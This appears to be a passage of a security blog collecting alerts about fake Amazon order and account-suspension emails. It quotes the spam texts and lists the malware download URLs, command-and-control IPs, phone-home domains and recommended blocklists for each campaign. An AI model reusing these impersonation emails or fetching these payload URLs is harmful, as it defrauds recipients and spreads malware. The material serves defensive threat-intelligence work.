http://84.40.9.34/E8Zf43JY1/8/wXw4M%26H~J%7EQ5/./
http://37.139.23.200/NQwFPhXiqAw/i27%24Yz~M%2CS_/x$%2DKWssW9Yh/L3
http://37.139.23.200/jrsw4wgnsT4I2/p%3F%3FZ@BCiUhaO9FYoN~/JAkmQ+Z@1
http://37.139.23.200/unu0q1vzg3~tmww%3Fkp/ayf0u%24&l$%2Cqc%3F3@2+f.=hcf_c+vyqly%2Co.7/l%20nloj%7E%3F
http://37.139.23.200/RqCGVww2Sup3iH5rZ/h=abyF$sO%3DheysYSV/n5%3Fs/

It also downloads a malicious DLL which has a VirusTotal detection rate of 7/54 which identifies this as a version of Cridex.

Recommended blocklist 2:
84.40.9.34
37.139.23.200
hilfecenter-harz.de
garfield67.de

UPDATE 2  - 2014-11-03

A second version of the attachment is also being circulated, this time with a slightly different macro [pastebin] which downloads the same binary as before from http://garfield67.de/1.exe. I have updated blocklist 2.

UPDATE 3 - 2014-11-06

The spam has been updated with a new date and there are now three new malicious Word documents [1] [2] [3] [Malwr report] which contains one of two macros [1] [2] that download a malware binary from one of the two following locations:

http://castours.com/js/bin.exe
http://www.irming.hr/js/bin.exe

This file is saved as %TEMP%\LNZMTDCWLZX.exe and has a VirusTotal detection rate of 4/53. The Malwr report shows that it connects to:

http://84.40.9.34/NjTrZuSH2&rb/@&RT/aATv%2BqGe%2C

It also drops a DLL which has a VirusTotal detection rate of 8/53 which is identified as Cridex.

"Your Amazon.co.uk order" spam with malformed DOC attachment

A whole bunch of these just came through:

From:     AMAZON.CO.UK [order@amazon.co.uk]
To:     1122@eddfg.com
Date:     13 October 2014 08:32
Subject:     Your Amazon.co.uk order }837-1171095-3201918

Hello, Thanks for your order. We’ll let you know once your item(s) have dispatched.You can view the status of your order or make changes to it by visiting Your Orders on Amazon.co.uk.

Order Details

Order #837-1171095-3201918 Placed on October 11, 2014 Order details and invoice in attached file.

Need to make changes to your order? Visit our Help page for more information and video guides.

We hope to see you again soon. Amazon.co.uk

The order number changes in each version of the spam. Note the misplaced "}" in the title though.. that's not the only thing wrong with this spam.

Attached is a file with a random number and a DOC extension, but in fact it is a plain text attachment that begins:

0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAPgADAP7/CQAGAAAAAAAAAAAAAAABAAAAIgAAAAAA
AAAAEAAAJAAAAAEAAAD+////AAAAACEAAAD/////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
///////////////////////////////////spcEAKWAZBAAA8BK/AAAAAAAAEAAAAAAABgAA
AQgAAA4AYmpiaoARgBEAAAAAAAAAAAAAAAAAAAAAAAAZBBYALhAAAOJ7AADiewAAAQAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD//w8AAAAAAAAAAAD//w8AAAAAAAAAAAD//w8A
AAAAAAAAAAAAAAAAAAAAAKQAAAAAALADAAAAAAAAsAMAALADAAAAAAAAsAMAAAAAAACwAwAA
AAAAALADAAAAAAAAsAMAABQAAAAAAAAAAAAAAOoDAAAUAAAAIgQAAAAAAAAiBAAAAAAAACIE

Obviously something has gone wrong here, it looks like the attachment is Base 64 encoded when it shouldn't be, but running it through a decode still seems to generate nothing but junk.

My guess is that something has gone wrong with this spam run, and this is meant to be a malicious executable. As it stands, neither the original or decoded version trigger anything at VirusTotal [1] [2]. There's a good chance that the bad guys will figure this out and fix it though, so be cautious if you receive an unexpected email from Amazon.

"AMAZON.CO.UK - Your Amazon order" spam

Another fake Amazon spam with a malicious payload:

Date:      Wed, 30 Jul 2014 18:08:43 +0800 [06:08:43 EDT]
From:      "AMAZON.CO.UK" [ckggzphqu@Amazon.co.uk]
Subject:      Your Amazon order #853-9908013-4362599

Hello,

Thank you for your order. We'll let you know once your item(s) have dispatched.You can check the status of your order or make changes to it by visiting Your Orders on Amazon.co.uk.
Order Details

Order #853-9908013-4362599 Placed on July 26, 2014

Order details and invoice in attached file.

Need to make changes to your order? Visit our Help page for more information and video guides.

We hope to see you again soon.
Amazon.co.uk

 There's a ZIP file attached (in this case Order-853-9908013-4362599.zip) which unzips to a folder Order details with a malicious file ORDER-992-5188991-000933.exe which has a VirusTotal detection rate of 9/53. The Comodo CAMAS report shows that it downloads a further component from these following locations:

utilatas.com/333
sdi-ppe.com/333
shahlon.com/333
croydonsog.org/333
pc2print.co.uk/333
geo.num.edu.mn/333
hendredestate.co.uk/333
kelias.com/~anonimas/333
168.144.179.82/333
alperacarli.com/333
thecolabnetwork.com/333
www.deltaplus.com.sg/333
george-bergsig.co.za/333
qatthailand.com/333
deltaplus.com.sg/333
elegantscreens.com/333
drkeithrix.co.uk/333
w3stest.webuda.com/333
www.divine-paradise.com/333
www.langrace.com/333
avengingarden.com/333

This second executable has a VT detection rate of 5/54. I recommend blocking the following sites:
utilatas.com
sdi-ppe.com
shahlon.com
croydonsog.org
pc2print.co.uk
geo.num.edu.mn
hendredestate.co.uk
alperacarli.com
thecolabnetwork.com
deltaplus.com.sg
george-bergsig.co.za
qatthailand.com
deltaplus.com.sg
elegantscreens.com
drkeithrix.co.uk
w3stest.webuda.com
divine-paradise.com
langrace.com
avengingarden.com

amazon.co.uk "Your Amazon order" spam

This fake Amazon spam comes with a malicious attachment:

Date:      Mon, 28 Jul 2014 13:15:57 +0200 [07:15:57 EDT]
From:      "AMAZON.CO.UK" [egljlyzqv@Amazon.co.uk]
Subject:      Your Amazon order #239-1744919-1697181

Hello,

Thank you for your order. We'll let you know once your item(s) have dispatched.You can check the status of your order or make changes to it by visiting Your Orders on Amazon.co.uk.
Order Details

Order #239-1744919-1697181 Placed on July 26, 2014

Order details and invoice in attached file.

Need to make changes to your order? Visit our Help page for more information and video guides.

We hope to see you again soon.
Amazon.co.uk

Attached is a file Order-239-1744919-1697181.zip which in turn contains a malicious executable Order details 001-8821901-992107.exe which has a VirusTotal detection rate of 18/54.

The Comodo CAMAS analysis shows that the malware reaches out to a familiar set of URLs to download further components:

www.zag.com.ua/333
daisyblue.ru/333
www.ricebox.biz/333
brandsalted.com/333
fbcashmethod.ru/333
expositoresrollup.es/333
madrasahhusainiyahkl.com/333
sexyfoxy.ts6.ru/333
www.huework.com/333
siliconharbourng.com/333
www.martijnvanhout.nl/333

I would recommend blocking the following domains:
zag.com.ua
daisyblue.ru
ricebox.biz
brandsalted.com
fbcashmethod.ru
expositoresrollup.es
madrasahhusainiyahkl.com
sexyfoxy.ts6.ru
huework.com
siliconharbourng.com
martijnvanhout.nl

Amazon Local "Order Details" spam / order_id.zip

This fake Amazon spam has a malicious attachment:

Date:      Wed, 2 Jul 2014 03:33:39 -0800 [07:33:39 EDT]
From:      "Amazon.com"
Subject:      Order Details

National     AmazonLocal.com
Good day,

Thank you for your order. We’ll let you know once your item(s) have dispatched.You can view the status of your order or make changes to it by visiting Your Orders on Amazon.com.
Order Details

Order R:121218 Placed on May 28, 2014

Order details and invoice in attached file.

Need to make changes to your order? Visit our Help page for more information and video guides.

We hope to see you again soon. Amazon.com

Attached is a file order_id.zip which in turn contains the malicious executable order_id_467832647826378462387462837.exe which is detected as malicious by 5/54 engines of VirusTotal. Automated analysis tools are inconclusive about what this malware does. [1] [2]

Amazon.com spam / order.zip

This fake Amazon spam has a malicious attachment:

Date:      Wed, 04 Jun 2014 11:55:10 +0200 [05:55:10 EDT]
From:      "Amazon.com"
Subject:      Shipping Confirmation : Order #002-1301707075-0206502025

Amazon
Your Recommendations
     |      Your Orders      |      Amazon.com
Shipping Confirmation
Order #002-1660680038-7011611870
Hello ,
Thank you for shopping with us. We'd like to let you know that Amazon has received your order, and is preparing it for shipment. Your estimated delivery date is below. If you would like to view the status of your order report is attached here.
This email was sent from a notification-only address that cannot accept incoming email. Please do not reply to this message.

Attached to the spam is an archive file order.zip which in turn contains a malicious executable order_id_26348273894729847239.exe which has a VirusTotal detection rate of 4/51.

Automated analysis tools [1] [2] [3] shows the malware altering system files and creating a fake csrss.exe and svhost.exe to run at startup.

The malware also attempts to phone home to two IP addresses at 91.226.212.32 and 193.203.48.37 hosted in Russia but controlled by a Ukranian person or entity PE Ivanov Vitaliy Sergeevich. These network blocks are well-known purveyors of crapware, and I recommend that you block the following:

91.226.212.0/23
193.203.48.0/22

Amazon.co.uk spam, something evil on 50.116.4.71

This fake Amazon.co.uk spam comes with a malicious attachment:

Date:      Fri, 21 Mar 2014 13:40:05 +0530 [04:10:05 EDT]
From:      "AMAZON.CO.UK" [SALES@AMAZON.CO.UK]
Cc:      ; Fri, 21 Mar 2014 13:40:05 +0530
Subject:      Your Amazon.co.uk order ID841-6379889-7781077

Hello,  Thanks for your order. We’ll let you know once your item(s) have dispatched.You can check the status of your order or make changes to it by visiting Your Orders on Amazon.co.uk.  

  
Order Details
Order #799-5059801-3688207  Placed on March 21, 2014 Order details and invoice in attached file.
  
Need to make changes to your order? Visit our Help page for more information and video guides.  
  
We hope to see you again soon.   Amazon.co.uk 

There is an attachment Order details 21.04.2014 Amazon 19-1101.zip which contains a quite large 596Kb malicious executable Order details 21.04.2014 Amazon 19-1101.exe which only has a VirusTotal detection rate of 2/51.

The Malwr analysisis the most comprehensive, and shows that it attempts to phone home to the following domains:

aulbbiwslxpvvphxnjij.biz
hxlbjvgmfzwcbyijzxojcugizd.info
mneudhugiorkbhtpaiuoemydzll.org
mfcyqgeupknhqrwljrprotufm.net
jzfetwydrfachqwgnylbu.com
eqtvtspngaeixdizhhiqckrged.ru
fqyxcinvcfkfxnltsghahrmn.com
pbzdofdxwokbnrvodiirzqshaem.net
hyvoydfadyxfmjnhmzjbxkgurcbu.org
dacahylpzylydlbgujruzxxrseyt.info
knpzqcaygabuxkcynjaidudceu.biz
soinlzhxohtcazlqkgegtcvxkr.ru
fuzllbxkzhqgrbaonivkzjjzdmjn.com
thicazjzxtxhknyeusx.info
afaxdlrnjdevgddqrcvkdmvemwo.org
kfmfpxtcmrnjgeusirylhrcqfe.biz
hmbcyromzibkpuxfiaetx.com
qoluciztogagugergdqqclxwkaekr.ru
payypdmhxcxxvgvsojdqs.com
pscxwztdudidivhixksrrduda.net
wgpztgpxgonhalcjrpxkau.biz
nrdiqotuoxcbaxokrfqcilcal.info
fycquworzhlmhqthixphq.com
uqgheqtozhrsjqfiaizci.ru
zdeiswsdqnvhleijfzltvwdxc.com

Out of these, aulbbiwslxpvvphxnjij.biz seems to be active on 50.116.4.71 (Linode, US)

Combining the "phone home" domains with the other malicious domains hosted on that IP gives the following recommended blocklist:
50.116.4.71
afaxdlrnjdevgddqrcvkdmvemwo.org
aqllbfahiivcelzqcfmdmoqhwc.com
aulbbiwslxpvvphxnjij.biz
balodcmzlqtcjbhllfwcmmb.biz
batlrintscnbytinqsqgbyvs.info
bqpwkxwsaudhehjzpwsvowcobqk.com
dacahylpzylydlbgujruzxxrseyt.info
dahzlwskgileyplljlhq.org
ddxwnbusvwtwtcfizdmskxso.biz
dgqzkzxsmzqggiwccattorwobfu.ru
duonxdivrwbahpxdpmbzdhm.org
dwsirwclqopforlqkjrdpncqkr.net
eqtvtspngaeixdizhhiqckrged.ru
fqyxcinvcfkfxnltsghahrmn.com
fuzllbxkzhqgrbaonivkzjjzdmjn.com
fycquworzhlmhqthixphq.com
gefifqtwgydaivpjbubuaiwglsrg.org
gqvwwcgqnjrkteyqacrkthfmxk.org
hmbcyromzibkpuxfiaetx.com
hxlbjvgmfzwcbyijzxojcugizd.info
hyvoydfadyxfmjnhmzjbxkgurcbu.org
jzfetwydrfachqwgnylbu.com
kblfxnrltorstolxcgqugbyyl.com
kfmfpxtcmrnjgeusirylhrcqfe.biz
knpzqcaygabuxkcynjaidudceu.biz
li430-71.members.linode.com
lxpvyhnbbmvkkfpbayuomnaqzx.org
lzrrgfmeuucvtpzpvhxdaqcbyay.info
mfcyqgeupknhqrwljrprotufm.net
mneudhugiorkbhtpaiuoemydzll.org
nrdiqotuoxcbaxokrfqcilcal.info
payypdmhxcxxvgvsojdqs.com
pbzdofdxwokbnrvodiirzqshaem.net
pscxwztdudidivhixksrrduda.net
pvgrkzdcidybihtsqweqnbgztjb.com
pypfyinnfhyvxkujlfbmkbdq.com
qmrowchvdejfaauclrfqhx.org
qoluciztogagugergdqqclxwkaekr.ru
rgvoxwhtamqwbuhdvonbnjhytuo.org
rsaspfpzmzrobonylxp.biz
soinlzhxohtcazlqkgegtcvxkr.ru
tceeaaetvgcypqfysqctam.com
thicazjzxtxhknyeusx.info
twdepffvwpxxnbqyhgmtcx.org
uqgheqtozhrsjqfiaizci.ru
wgpztgpxgonhalcjrpxkau.biz
www.aulbbiwslxpvvphxnjij.biz
xaqfmfzxvoxglzofedmjskhatwsw.net
xfmheaqdepbyinkfjbnztemhmvkvk.com
xmjdjbucxwztqoojordmfmzfexc.com
xoxllplffmaknofjbjnkbdisw.com
xpjrvoddmfempuwbymwhejbt.com
zdeiswsdqnvhleijfzltvwdxc.com

Amazon.com "Important For Your Online Account Access" spam / 213.152.26.150

This fake Amazon spam leads to something bad.

Date:      Wed, 26 Feb 2014 13:09:55 -0400 [02/26/14 12:09:55 EST]
From:      "Amazon.com" [t1na@msn.com]
Subject:      Important For Your Online Account Access .

Your Account Has Been Held

Dear Customer ,

We take you to note that your account has been suspended for protection , Where the password was entered more than once .

In order to protect ,account has been suspended .Please update your Account Information To verify the account.

http://www.amazon.com/gp/orc/rml/D0bvnTq6RRMA

Thanks for Update at Amazon.com.

-------------------------------------------------------------
Amazon.com
http://www.amazon.com
-------------------------------------------------------------

Please note: This e-mail message was sent from a notification-only address that
cannot accept incoming e-mail. Please do not reply to this message.

In the samples that I have seen the link in the email goes to either [donotclick]exivenca.com/support.php or [donotclick]vicorpseguridad.com/support.php both of which are currently down but were both legitimate sites hosted on 213.152.26.150 (Neo Telecoms, France). The fact that these sites are down could be because the host is dealing with the problem, however I would expect to see this same email template being used again in the future, so take care..

"Unauthorized Activity on your Amazon account" phish

The New Year seems to have brought a new wave of phishing emails, here's a new one looking for Amazon credentials.

Date:      Mon, 6 Jan 2014 08:19:39 -0000 [03:19:39 EST]
From:      Amazon [noreply@trysensa.com]

Case- 91289-90990

Unauthorized Activity on your Amazon account.

We recently confirmed that you had unauthorized activity on your Amazon account.

Please be assured that because your card includes "zero-liability fraud protection" , you are not responsible for unauthorized use of your card.

Unfortunately, we have not confirmed your complete information , please follow the instructions below.

Click the link below to validate your account information using our secure server:

Click Here To Active Your Amazon Account

For your protection, you must verify this activity before you can continue using your account

Thank You.
Amazon LTD Security System

The link in the email goes to [donotclick]immedicenter.com/immedicenter/images/yootheme/menu/Amazon/index.php and comes up with a convincing-looking Amazon login page:

The next page phishes for even more information:

And now it goes after your credit card information:

And having stolen all your information, you get a nice message to say thank-you:

The hapless victim then gets sent to the genuine Amazon.com website.

In most email clients, floating over the link would clearly demonstrate that this was not the legitimate amazon.com website, and certainly once visited (not something I would recommend) then the address bar at the top of the browser would clearly indicate it is not amazon.com.

If you have accidentally clicked through this email and provided all the details then you should contact your bank immediately and also change your Amazon password plus any other places that you use that same username/password combination.

Fake Amazon.co.uk order spam / AM-ORDER-65HNA1972.exe

This fake Amazon spam has a malicious attachment:

Date:      Tue, 10 Dec 2013 11:19:03 +0200 [04:19:03 EST]
From:      blackjacksxjt@yahoo.com
Subject:      order #822-8266277-7103199

Good evening, Thank you for your order. We�ll let you know once your item(s) have dispatched.You can check the status of your order or make changes to it by visiting Your Orders on Amazon.co.uk.

Order Details

Order #481-0295978-7625805 Placed on December 8, 2013 Order details and invoice in attached file.

Need to make changes to your order? Visit our Help page for more information and video guides.

We hope to see you again soon. Amazon.co.uk

Attached is an archive file AM-ORDER-65HNA1972.zip (VirusTotal detections 9/47) which in turn contains a malicious executable AM-ORDER-65HNA1972.exe (VirusTotal detections 9/49) which has an icon to make it look like some sort of document.

Automated analysis tools seem to be timing out [1] [2] indicating perhaps that it has been hardened against sandbox analysis.